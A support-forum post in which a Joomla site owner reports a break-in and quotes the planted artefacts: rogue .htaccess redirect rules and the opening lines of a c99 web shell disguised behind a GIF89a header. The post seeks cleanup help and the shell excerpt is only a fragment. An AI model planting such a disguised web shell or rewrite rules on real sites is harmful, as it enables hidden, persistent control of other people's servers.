#10318 Hacked by Something that got by Admin Tools Pro!

Posted in ‘Admin Tools for Joomla! 4 & 5’

Latest post by nicholas on Sunday, 20 November 2011 02:42 CST

user40075
Hi Nikko!

I was hacked today.
I have found the following hacker files on the public_html root of mysite.com:
blogger.com, coke.net, img.youtube.com, and picasa.com.

They were put there today, as far as I can tell.

According to Joomla, this is an identified hacker program:
http://forum.joomla.org/viewtopic.php?p=2637101

I have segregated the files into a new folder in public_html called "Quarantine."

This does not prevent picasa.com from reappearing after I get rid of it.

They all contain .htaccess files similar to the following:
RewriteEngine on
RewriteCond %{HTTP_HOST} ^picasa\.com\.mysite\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.picasa\.com\.mysite\.com$
RewriteRule ^/?$ "http\:\/\/picasa\.com\.mysite\.com" [R=301,L]

Each contains a large (190kb) pl.php file that begins as follows:

GIF89a?????ÿÿÿ!ù????,???????D?;?
/*******************************************/
/* c99 injektor v1 06.2008 */
/* Re-coded and modified By coke */
/* #[email protected] */
/*******************************************/
$sh_id = "Y29rZQ=";
$sh_ver = "- exploit";
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = "http://google.com";
$html_start = ''.
'
'.$sh_name. ' - '.getenv("HTTP_HOST").'